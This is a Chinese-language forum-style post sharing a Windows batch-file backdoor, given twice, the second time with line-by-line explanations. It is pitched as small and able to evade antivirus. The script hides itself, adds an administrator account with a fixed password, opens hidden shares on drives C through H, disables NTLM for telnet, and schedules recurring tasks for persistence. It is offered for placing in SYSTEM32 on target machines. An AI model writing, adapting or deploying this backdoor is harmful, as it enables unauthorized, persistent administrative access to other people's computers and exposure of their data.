代码思路是影子鹰DESERT朋友的，原代码比较麻烦，我做了改进，这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了 ，代码如下：
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
可惜这个批处理不能用在Windows Vista的系统上和Windows Server Edition 2003上 可惜，实在是可惜！
虽然在Windows Server Edition 2003下在改一下路径是可以实现后门功能，但在Windows Vista下就用不了了，真是可惜！

@echo off
@attrib +s + r xyt.bat '将xyt.bat文件设置为 “只读＋系统” 属性
@net user xyt hacker /add
@net localgroup administrators xyt /add ‘前面两句 添加一个名字为hacker的用户 并添加到管理员组
@net share c$=c: @net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h: ’共享 c,d,e,f,g,g盘
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule ‘前两句 重启 “计划任务”服务
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet ’前两句：重启telnet服务
@exit

只有第一行要@

后面的每行开头的@都可以删掉